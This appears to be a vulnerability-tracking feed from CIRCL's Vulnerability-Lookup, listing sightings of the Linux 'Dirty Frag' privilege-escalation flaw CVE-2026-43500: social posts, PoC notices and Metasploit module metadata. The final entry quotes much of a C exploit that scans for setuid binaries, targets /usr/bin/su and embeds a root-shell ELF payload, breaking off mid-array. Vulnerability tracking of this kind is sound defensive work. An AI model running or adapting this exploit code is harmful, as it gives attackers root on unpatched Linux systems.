https://vulnerability.circl.lu/sightings/feed 2026-05-27T19:38:11.440943+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent sightings. https://vulnerability.circl.lu/sighting/90ce62b7-9625-495f-8f5e-966b6e26e674/export 2026-05-27T19:38:11.453807+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "90ce62b7-9625-495f-8f5e-966b6e26e674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlwshvs3sk2v", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 90 interactions\nCVE-2026-43500: 71 interactions\nCVE-2026-42511: 56 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-42897: 36 interactions\nCVE-2026-20182: 13 interactions\nCVE-2026-42945: 12 interactions\n", "creation_timestamp": "2026-05-16T02:32:20.730258Z"} 2026-05-16T02:32:20.730258+00:00 https://vulnerability.circl.lu/sighting/243d205f-1ee6-4f97-bc6e-98d92fc9a35d/export 2026-05-27T19:38:11.453736+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "243d205f-1ee6-4f97-bc6e-98d92fc9a35d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "published-proof-of-concept", "source": "Telegram/QUF9weJLwCd1qHdTEuhp0UyLZi4jvqqQc5vVfkezLkJSkiA", "content": "", "creation_timestamp": "2026-05-19T03:00:06.000000Z"} 2026-05-19T03:00:06+00:00 https://vulnerability.circl.lu/sighting/d838d1a3-af9c-43b5-a058-b4c5a1728639/export 2026-05-27T19:38:11.453660+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "d838d1a3-af9c-43b5-a058-b4c5a1728639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mmbp6a4fv22r", "content": "\ud83d\udce2 Dirty Frag : deux vuln\u00e9rabilit\u00e9s Linux (CVE-2026-43284 et CVE-2026-43500) permettent une \u00e9l\u00e9vation de privil\u00e8ge\u2026\ud83d\udcdd \u2026\nhttps://cyberveille.ch/posts/2026-05-20-dirty-frag-deux-vulnerabilites-linux-cve-2026-43284-et-cve-2026-43500-permettent-une-elevation-de-privileges-root/ #CVE_2026_43284 #Cyberveil\u2026", "creation_timestamp": "2026-05-20T10:30:23.037492Z"} 2026-05-20T10:30:23.037492+00:00 https://vulnerability.circl.lu/sighting/2d295cf9-75fd-4e2c-879f-bc63061f6a8a/export 2026-05-27T19:38:11.453567+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "2d295cf9-75fd-4e2c-879f-bc63061f6a8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2026_43500_dirty_frag.rb", "content": "{\"actions\": [], \"aliases\": [], \"arch\": \"cmd\", \"author\": [\"Hyunwoo Kim\", \"Giovanni Heward\"], \"autofilter_ports\": [], \"autofilter_services\": [], \"check\": true, \"default_credential\": false, \"description\": \"CVE-2026-43500 exploits a memory-corruption vulnerability in the Linux kernel's RxRPC\\n authentication subsystem (rxkad). When a crafted DATA packet is delivered to an AF_RXRPC\\n socket configured with an attacker-controlled rxkad session key, the kernel's\\n rxkad_verify_packet_1() function performs an in-place 8-byte pcbc(fcrypt) decryption\\n directly on the page-cache page referenced by the splice offset. Because the decryption\\n mutates the page in-place without marking it dirty, the corrupted in-memory view is\\n immediately visible to all processes reading from the page cache. This allows a local\\n attacker to corrupt the in-memory contents of a SUID binary and escalate privileges to root.\", \"disclosure_date\": \"2026-05-08\", \"fullname\": \"exploit/linux/local/cve_2026_43500_dirty_frag\", \"is_install_path\": true, \"mod_time\": \"2026-05-21 11:49:08 +0000\", \"name\": \"rxkad Page-Cache Write via CVE-2026-43500\", \"needs_cleanup\": true, \"notes\": {\"Reliability\": [\"repeatable-session\"], \"SideEffects\": [\"artifacts-on-disk\"], \"Stability\": [\"crash-os-down\"]}, \"path\": \"/modules/exploits/linux/local/cve_2026_43500_dirty_frag.rb\", \"platform\": \"Linux,Unix\", \"post_auth\": false, \"rank\": 400, \"ref_name\": \"linux/local/cve_2026_43500_dirty_frag\", \"references\": [\"CVE-2026-43500\", \"URL-https://github.com/V4bel/dirtyfrag\"], \"rport\": null, \"session_types\": [\"shell\", \"meterpreter\"], \"targets\": [\"Auto\"], \"type\": \"exploit\"}", "creation_timestamp": "2026-05-21T10:50:23.000000Z"} 2026-05-21T10:50:23+00:00 https://vulnerability.circl.lu/sighting/0d3be26e-b73f-4a22-b512-12916fb7d21c/export 2026-05-27T19:38:11.453478+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "0d3be26e-b73f-4a22-b512-12916fb7d21c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/85248", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Dirtyfrag-go\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Koshmare-Blossom\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-21 15:55:35\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA Go implementation of dirtyfrag (CVE-2026-43284 / CVE-2026-43500)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-21T16:00:05.000000Z"} 2026-05-21T16:00:05+00:00 https://vulnerability.circl.lu/sighting/bc9c8a97-42cd-4716-a5ea-f825887e81b4/export 2026-05-27T19:38:11.453405+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "bc9c8a97-42cd-4716-a5ea-f825887e81b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "published-proof-of-concept", "source": "Telegram/pekQneQSghJS9ruSll4_086gjVL0B0HejJCeE2Ffiq4w67c", "content": "", "creation_timestamp": "2026-05-21T23:00:10.000000Z"} 2026-05-21T23:00:10+00:00 https://vulnerability.circl.lu/sighting/3509b0e6-24fa-4d1a-8eb8-32cfe41a18a1/export 2026-05-27T19:38:11.453326+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "3509b0e6-24fa-4d1a-8eb8-32cfe41a18a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyr4kgoa2u", "content": "\ud83d\udd17 CVE : CVE-2025-54518, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:18.413608Z"} 2026-05-22T13:05:18.413608+00:00 https://vulnerability.circl.lu/sighting/b0ae9072-c14f-4560-9285-70fb403d6338/export 2026-05-27T19:38:11.453223+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "b0ae9072-c14f-4560-9285-70fb403d6338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmhyt66qb227", "content": "\u30a2\u30af\u30c6\u30a3\u30d6\u653b\u6483\uff1aLinux\u306eDirty Frag\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u4fb5\u5bb3\u5f8c\u306e\u30ea\u30b9\u30af\u304c\u62e1\u5927\n\n\u300cDirty Frag\u300d\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u3001\u65b0\u305f\u306b\u660e\u3089\u304b\u306b\u306a\u3063\u305fLinux\u306e\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001esp4\u3001esp6\uff08CVE-2026-43284\uff09\u3001rxrpc\uff08CVE-2026-43500\uff09\u306a\u3069\u306e\u8106\u5f31\u306a\u30ab\u30fc\u30cd\u30eb\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u304a\u3088\u3073\u30e1\u30e2\u30ea\u30d5\u30e9\u30b0\u30e1\u30f3\u30c8\u51e6\u7406\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u4ecb\u3057\u3066\u3001\u6a29\u9650\u306e\u306a\u3044\u30e6\u30fc\u30b6\u30fc\u304b\u3089root\u6a29\u9650\u3078\u306e\u6607\u683c\u304c\u53ef\u80fd\u306b\u306a\u308a\u307e\u3059\u3002\u516c\u958b\u3055\u308c\u305f\u5831\u544a\u3084\u6982\u5ff5\u5b9f\u8a3c\u6d3b\u52d5\u304b\u3089\u3001\u3053\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u5f93\u6765\u306e\u7af6\u5408\u72b6\u614b\u306b\u4f9d\u5b58\u3059\u308bLinux\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u624b\u6cd5\u3088\u308a\u3082\u4fe1\u983c\u6027\u306e\u9ad8\u3044\u6a29\u9650\u6607\u683c\u3092\u5b9f\u73fe\u3059\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u3066\u3044\u308b...", "creation_timestamp": "2026-05-22T22:39:13.177285Z"} 2026-05-22T22:39:13.177285+00:00 https://vulnerability.circl.lu/sighting/b5df876a-479b-42f9-a547-ba12cb3ca717/export 2026-05-27T19:38:11.452469+00:00 Joseph Lee https://vulnerability.circl.lu/user/syspect {"uuid": "b5df876a-479b-42f9-a547-ba12cb3ca717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/control-systems-moxa-security-advisory-av26-509", "content": "", "creation_timestamp": "2026-05-26T05:59:13.000000Z"} 2026-05-26T05:59:13+00:00 https://vulnerability.circl.lu/sighting/a33a231b-aea3-4d29-9f58-276e517078f6/export 2026-05-27T19:38:11.450967+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "a33a231b-aea3-4d29-9f58-276e517078f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/spynika/9c98aca892e18aff2b87d04aa69cc7d7", "content": "#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef UDP_ENCAP\n#define UDP_ENCAP 100\n#endif\n#ifndef UDP_ENCAP_ESPINUDP\n#define UDP_ENCAP_ESPINUDP 2\n#endif\n#ifndef SOL_UDP\n#define SOL_UDP 17\n#endif\n\n#define ENC_PORT 4500\n#define SEQ_VAL 200\n#define REPLAY_SEQ 100\n#define PATCH_OFFSET 0\n#define PAYLOAD_LEN 192\n#define ENTRY_OFFSET 0x78\n#define TOTAL_SAS (PAYLOAD_LEN / 4)\n#define SPI_BASE 0xDEADBE10u\n\nstatic const char *g_target = \"/usr/bin/su\";\nstatic unsigned char g_backup[PAYLOAD_LEN];\nstatic int g_have_backup = 0;\n\nstatic int g_tty = 0;\nstatic int g_verbose = 0;\nstatic int g_setuid_count = 0;\nstatic int g_exploitable_count = 0;\n\n/* first instructions of embedded shell ELF at file offset 0x78 */\nstatic const uint8_t su_marker[8] = {\n\t0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a,\n};\n\n#define C_RST \"\\033[0m\"\n#define C_DIM \"\\033[2m\"\n#define C_RED \"\\033[31m\"\n#define C_GRN \"\\033[32m\"\n#define C_YEL \"\\033[33m\"\n#define C_BLU \"\\033[34m\"\n#define C_MAG \"\\033[35m\"\n#define C_CYN \"\\033[36m\"\n#define C_WHT \"\\033[1;37m\"\n#define C_BOLD \"\\033[1m\"\n\n#define C(x) (g_tty ? (x) : \"\")\n\nstatic void print_banner(void)\n{\n\tprintf(\"\\n\");\n\tprintf(\"%s\", C(C_CYN));\n\tprintf(\" \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\" \u2551 SLEY - CVE-2026-43284 dirtyfrag PoC \u2551\\n\");\n\tprintf(\" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n}\n\nstatic void status_line(const char *label, int ok, const char *detail)\n{\n\tprintf(\" %s[%s]%s %-22s\",\n\t C(C_DIM), ok ? \"+\" : \"-\", C(C_RST), label);\n\tif (detail && detail[0])\n\t\tprintf(\" %s%s%s\", ok ? C(C_GRN) : C(C_RED), detail, C(C_RST));\n\tprintf(\"\\n\");\n}\n\nstatic void phase_header(int n, const char *title)\n{\n\tprintf(\"%s\u250c\u2500[%s phase %d%s] %s%s\\n\",\n\t C(C_CYN), C(C_MAG), n, C(C_CYN), title, C(C_RST));\n}\n\nstatic int cfg_value_ok(const char *val, const char *expect)\n{\n\tif (!val || !*val)\n\t\treturn 0;\n\tif (strcmp(expect, \"ym\") == 0)\n\t\treturn val[0] == 'y' || val[0] == 'm';\n\treturn strcmp(val, expect) == 0;\n}\n\nstruct kconfig_req {\n\tconst char *key;\n\tconst char *expect;\n\tconst char *hint;\n\tchar val[32];\n\tint found;\n};\n\nstatic void scan_kconfig(FILE *f, struct kconfig_req *req, size_t nreq)\n{\n\tchar line[256];\n\n\tfor (size_t i = 0; i < nreq; i++) {\n\t\treq[i].val[0] = '\\0';\n\t\treq[i].found = 0;\n\t}\n\n\twhile (fgets(line, sizeof(line), f)) {\n\t\tfor (size_t i = 0; i < nreq; i++) {\n\t\t\tif (req[i].found)\n\t\t\t\tcontinue;\n\t\t\tsize_t klen = strlen(req[i].key);\n\t\t\tif (strncmp(line, req[i].key, klen) != 0 || line[klen] != '=')\n\t\t\t\tcontinue;\n\t\t\tconst char *v = line + klen + 1;\n\t\t\tsize_t n = strcspn(v, \"\\n\\r\");\n\t\t\tif (n >= sizeof(req[i].val))\n\t\t\t\tn = sizeof(req[i].val) - 1;\n\t\t\tmemcpy(req[i].val, v, n);\n\t\t\treq[i].val[n] = '\\0';\n\t\t\treq[i].found = 1;\n\t\t}\n\t}\n}\n\nstatic FILE *open_kconfig_gz(const char *src, int *via_popen)\n{\n\tstatic const char *cmds[] = {\n\t\t\"gzip -dc '%s' 2>/dev/null\",\n\t\t\"zcat '%s' 2>/dev/null\",\n\t\tNULL,\n\t};\n\tchar cmd[256];\n\n\tfor (int i = 0; cmds[i]; i++) {\n\t\tsnprintf(cmd, sizeof(cmd), cmds[i], src);\n\t\tFILE *f = popen(cmd, \"r\");\n\t\tif (f) {\n\t\t\t*via_popen = 1;\n\t\t\treturn f;\n\t\t}\n\t}\n\treturn NULL;\n}\n\nstatic FILE *open_kconfig_source(const char *release, char *label, size_t labellen,\n\t\t\t\t int *via_popen)\n{\n\tchar path[512];\n\tFILE *f;\n\n\t*via_popen = 0;\n\n\tsnprintf(path, sizeof(path), \"/boot/config-%s\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/build/.config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tif (access(\"/proc/config.gz\", R_OK) == 0) {\n\t\tf = open_kconfig_gz(\"/proc/config.gz\", via_popen);\n\t\tif (f) {\n\t\t\tsnprintf(label, labellen, \"/proc/config.gz\");\n\t\t\treturn f;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nstatic void close_kconfig(FILE *f, int via_popen)\n{\n\tif (!f)\n\t\treturn;\n\tif (via_popen)\n\t\tpclose(f);\n\telse\n\t\tfclose(f);\n}\n\nstatic int check_kernel_config(void)\n{\n\tstruct utsname uts;\n\tchar cfglabel[512];\n\tint via_popen = 0;\n\n\tif (uname(&uts) < 0) {\n\t\tstatus_line(\"uname\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tphase_header(1, \"kernel config preflight\");\n\n\tFILE *cfg = open_kconfig_source(uts.release, cfglabel, sizeof(cfglabel), &via_popen);\n\tif (!cfg) {\n\t\tstatus_line(\"config file\", 0, \"not found under /boot, /lib/modules, /proc\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s [!] WSL2: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr, \"%s [!] or: grep -E \\\"...\\\" /boot/config-%s%s\\n\\n\",\n\t\t C(C_YEL), uts.release, C(C_RST));\n\t\treturn -1;\n\t}\n\n\tprintf(\" %s\u2192%s %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_BLU), cfglabel, C(C_RST));\n\tstatus_line(\"config file\", 1, via_popen ? \"via gzip/zcat\" : \"plain text\");\n\n\tstruct kconfig_req req[] = {\n\t\t{ \"CONFIG_USER_NS\", \"y\", \"required =y\" },\n\t\t{ \"CONFIG_XFRM\", \"y\", \"required =y\" },\n\t\t{ \"CONFIG_INET_ESP\", \"ym\", \"required =m or =y\" },\n\t};\n\tsize_t nreq = sizeof(req) / sizeof(req[0]);\n\tint ok_all = 1;\n\n\tscan_kconfig(cfg, req, nreq);\n\n\tfor (size_t i = 0; i < nreq; i++) {\n\t\tint ok = req[i].found && cfg_value_ok(req[i].val, req[i].expect);\n\t\tchar detail[128];\n\t\tif (req[i].found)\n\t\t\tsnprintf(detail, sizeof(detail), \"= %s (%s)\", req[i].val, req[i].hint);\n\t\telse\n\t\t\tsnprintf(detail, sizeof(detail), \"missing (%s)\", req[i].hint);\n\t\tstatus_line(req[i].key, ok, detail);\n\t\tif (!ok)\n\t\t\tok_all = 0;\n\t}\n\n\tclose_kconfig(cfg, via_popen);\n\n\tprintf(\"\\n\");\n\tif (!ok_all) {\n\t\tfprintf(stderr, \"%s [!] kernel does not meet exploit requirements.%s\\n\", C(C_RED), C(C_RST));\n\t\tfprintf(stderr, \"%s [!] manual check: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\\n\",\n\t\t C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"%s kernel options OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic void print_sysctl_val(const char *path, const char *name)\n{\n\tFILE *f = fopen(path, \"r\");\n\tif (!f)\n\t\treturn;\n\tchar val[64];\n\tif (!fgets(val, sizeof(val), f)) {\n\t\tfclose(f);\n\t\treturn;\n\t}\n\tval[strcspn(val, \"\\n\\r\")] = '\\0';\n\tprintf(\" %s%s%s = %s\\n\", C(C_DIM), name, C(C_RST), val);\n\tfclose(f);\n}\n\nstatic int check_userns_runtime(void)\n{\n\tphase_header(2, \"user namespace runtime check\");\n\tprintf(\" %s\u2192%s unshare(CLONE_NEWUSER | CLONE_NEWNET)%s\\n\\n\",\n\t C(C_DIM), C(C_RST), C(C_DIM));\n\n\tif (getuid() == 0) {\n\t\tstatus_line(\"privilege\", 0, \"running as root \u2014 use an unprivileged user for LPE\");\n\t\tfprintf(stderr, \"\\n%s [!] Exploit is meant to run as a normal user (uid != 0).%s\\n\\n\",\n\t\t C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tpid_t pid = fork();\n\tif (pid < 0) {\n\t\tstatus_line(\"fork\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0)\n\t\t\t_exit(1);\n\t\t_exit(0);\n\t}\n\n\tint st;\n\tif (waitpid(pid, &st, 0) < 0) {\n\t\tstatus_line(\"waitpid\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint ok = WIFEXITED(st) && WEXITSTATUS(st) == 0;\n\tif (!ok) {\n\t\tstatus_line(\"unshare\", 0, \"Operation not permitted\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s [!] CONFIG_USER_NS=y in /boot/config does not guarantee unprivileged userns at runtime.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s [!] This host blocks user namespaces (common on hardened Ubuntu 22.04+ / enterprise VMs).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s [!] Changing the setuid target (su/sudo/pkexec) will not help \u2014 unshare must succeed first.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tprintf(\"\\n %sRelevant sysctls on this host:%s\\n\", C(C_DIM), C(C_RST));\n\t\tprint_sysctl_val(\"/proc/sys/kernel/apparmor_restrict_unprivileged_userns\",\n\t\t\t\t \"kernel.apparmor_restrict_unprivileged_userns\");\n\t\tprint_sysctl_val(\"/proc/sys/kernel/unprivileged_userns_clone\",\n\t\t\t\t \"kernel.unprivileged_userns_clone\");\n\t\tprint_sysctl_val(\"/proc/sys/user/max_user_namespaces\",\n\t\t\t\t \"user.max_user_namespaces\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s [!] Lab only (as root): sysctl -w kernel.apparmor_restrict_unprivileged_userns=0%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s [!] Without userns: this PoC cannot run (see CVE-2026-43500 rxrpc variant).%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tstatus_line(\"unshare\", 1, \"user+net namespace available\");\n\tprintf(\"%s runtime userns check OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic int skip_tree(const char *path)\n{\n\treturn strcmp(path, \"/proc\") == 0 ||\n\t strcmp(path, \"/sys\") == 0 ||\n\t strcmp(path, \"/dev\") == 0 ||\n\t strcmp(path, \"/run\") == 0;\n}\n\nstatic int target_is_exploitable(const char *path)\n{\n\tstruct stat st;\n\n\tif (stat(path, &st) < 0 || !S_ISREG(st.st_mode))\n\t\treturn 0;\n\tif (!(st.st_mode & S_ISUID))\n\t\treturn 0;\n\tif (access(path, R_OK | X_OK) != 0)\n\t\treturn 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn 0;\n\tclose(fd);\n\treturn 1;\n}\n\nstatic int probe_target(const char *path, char *why, size_t whylen)\n{\n\tstruct stat st;\n\n\tif (stat(path, &st) < 0) {\n\t\tsnprintf(why, whylen, \"missing (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!S_ISREG(st.st_mode)) {\n\t\tsnprintf(why, whylen, \"not a regular file\");\n\t\treturn -1;\n\t}\n\tif (!(st.st_mode & S_ISUID)) {\n\t\tsnprintf(why, whylen, \"no setuid bit (mode %04o)\", st.st_mode & 07777);\n\t\treturn -1;\n\t}\n\tif (access(path, R_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not readable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (access(path, X_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not executable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0) {\n\t\tsnprintf(why, whylen, \"open(O_RDONLY) denied (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tclose(fd);\n\twhy[0] = '\\0';\n\treturn 0;\n}\n\nstatic int setuid_walk(const char *path, const struct stat *st, int flag,\n\t\t struct FTW *ftw)\n{\n\t(void)ftw;\n\tif (flag == FTW_D && skip_tree(path))\n\t\treturn FTW_SKIP_SUBTREE;\n\n\tif (flag != FTW_F)\n\t\treturn 0;\n\n\tif (!S_ISREG(st->st_mode))\n\t\treturn 0;\n\tif (!(st->st_mode & S_ISUID))\n\t\treturn 0;\n\n\tg_setuid_count++;\n\tint exploitable = target_is_exploitable(path);\n\tif (exploitable)\n\t\tg_exploitable_count++;\n\n\tint is_target = (strcmp(path, g_target) == 0);\n\tconst char *color = exploitable ? C(C_GRN) : C(C_YEL);\n\tconst char *badge = exploitable ? \"[+]\" : \"[~]\";\n\n\tprintf(\" %s%02d%s %s%s%s %s%s%s%s\\n\",\n\t C(C_DIM), g_setuid_count, C(C_RST),\n\t color, badge, C(C_RST), path,\n\t is_target ? \" \u2190 target\" : \"\",\n\t exploitable ? \"\" : \" (visible, not usable)\",\n\t C(C_RST));\n\treturn 0;\n}\n\nstatic int scan_setuid_binaries(void)\n{\n\tphase_header(3, \"setuid binary scan\");\n\tprintf(\" %s\u2192%s find / -perm -4000 -type f 2>/dev/null%s\\n\\n\",\n\t C(C_DIM), C(C_RST), C(C_DIM));\n\n\tg_setuid_count = 0;\n\tg_exploitable_count = 0;\n\tint rc = nftw(\"/\", setuid_walk, 32, FTW_PHYS | FTW_MOUNT);\n\n\tprintf(\"\\n\");\n\tif (rc != 0 && rc != EACCES) {\n\t\tstatus_line(\"nftw\", 0, strerror(rc > 0 ? rc : errno));\n\t}\n\tif (g_setuid_count == 0) {\n\t\tstatus_line(\"setuid\", 0, \"no SUID binaries found\");\n\t\treturn -1;\n\t}\n\tprintf(\"%s found %d setuid binaries, %d exploitable (readable + openable).%s\\n\",\n\t g_exploitable_count ? C(C_GRN) : C(C_YEL),\n\t g_setuid_count, g_exploitable_count, C(C_RST));\n\tif (g_exploitable_count == 0) {\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s [!] SUID files are visible but not readable \u2014 typical on shared hosting (CageFS/cPanel).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s [!] This exploit must open the target for read (splice). No usable target on this account.%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"\\n\");\n\treturn 0;\n}\n\n// minimal x86_64 root-shell ELF, entry=0x400078\n// setgid(0); setuid(0); execve(\"/bin/sh\", NULL, [\"TERM=xterm\",NULL]) \nstatic const unsigned char shell_elf[PAYLOAD_LEN] = {\n\t0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,\n\t0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,\n\t0x00,0x00,0x00,0x50,0